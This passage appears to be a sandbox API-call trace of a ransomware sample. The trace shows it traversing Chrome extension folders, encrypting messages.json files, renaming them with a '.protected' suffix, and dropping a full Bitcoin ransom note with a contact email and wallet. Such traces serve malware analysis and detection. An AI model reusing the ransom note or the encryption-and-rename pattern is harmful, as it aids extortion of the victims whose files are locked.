(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json") returned 157 [0079.336] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.336] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json") returned 157 [0079.336] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.336] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json") returned 157 [0079.336] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.336] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x104, lpOverlapped=0x0) returned 1 [0079.337] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.337] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x104, lpOverlapped=0x0) returned 1 [0079.338] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.338] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.338] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.338] CloseHandle (hObject=0x168) returned 1 [0079.338] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.protected") returned 167 [0079.338] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.protected")) returned 1 [0079.339] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.339] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.339] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\RESTORE_FILES.txt") returned 161 [0079.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.340] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.340] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.340] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.341] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.341] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.341] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.341] CloseHandle (hObject=0x164) returned 1 [0079.341] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.341] lstrcmpiW (lpString1="fr", lpString2="Windows") returned -1 [0079.341] lstrcmpiW (lpString1="fr", lpString2="Program Files") returned -1 [0079.341] lstrcmpiW (lpString1="fr", lpString2="Program Files (x86)") returned -1 [0079.341] lstrcmpiW (lpString1="fr", lpString2="$Recycle.bin") returned 1 [0079.341] lstrcmpiW (lpString1="fr", lpString2="System Volume Information") returned -1 [0079.341] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr") returned 142 [0079.341] lstrcmpW (lpString1="fr", lpString2=".") returned 1 [0079.341] lstrcmpW (lpString1="fr", lpString2="..") returned 1 [0079.341] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\*") returned 144 [0079.341] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.341] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.342] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.342] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.342] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.342] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.342] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\.") returned 144 [0079.342] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.342] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.342] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.342] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.342] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.342] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.342] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.342] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\..") returned 145 [0079.342] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.342] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.342] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.342] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.342] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.342] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.342] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.342] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.342] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json") returned 156 [0079.342] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.342] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.342] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.342] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.342] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.343] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json") returned 156 [0079.343] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.343] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json") returned 156 [0079.343] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.343] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json") returned 156 [0079.343] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.343] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xfc, lpOverlapped=0x0) returned 1 [0079.344] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.344] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xfc, lpOverlapped=0x0) returned 1 [0079.344] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.344] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.345] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.345] CloseHandle (hObject=0x168) returned 1 [0079.345] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.protected") returned 166 [0079.345] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.protected")) returned 1 [0079.345] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.345] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.346] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\RESTORE_FILES.txt") returned 160 [0079.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.346] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.346] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.347] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.347] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.347] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.347] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.347] CloseHandle (hObject=0x164) returned 1 [0079.347] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.347] lstrcmpiW (lpString1="he", lpString2="Windows") returned -1 [0079.347] lstrcmpiW (lpString1="he", lpString2="Program Files") returned -1 [0079.347] lstrcmpiW (lpString1="he", lpString2="Program Files (x86)") returned -1 [0079.347] lstrcmpiW (lpString1="he", lpString2="$Recycle.bin") returned 1 [0079.347] lstrcmpiW (lpString1="he", lpString2="System Volume Information") returned -1 [0079.347] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he") returned 142 [0079.347] lstrcmpW (lpString1="he", lpString2=".") returned 1 [0079.347] lstrcmpW (lpString1="he", lpString2="..") returned 1 [0079.347] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\*") returned 144 [0079.347] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.348] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.348] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.348] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.348] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.348] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.348] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\.") returned 144 [0079.348] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.348] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.348] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.348] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.348] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.348] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.348] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.348] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\..") returned 145 [0079.348] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.348] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.348] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.348] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.348] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.348] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.348] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.348] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.348] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json") returned 156 [0079.348] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.348] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.348] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.348] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.350] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json") returned 156 [0079.350] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.350] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json") returned 156 [0079.350] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.350] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 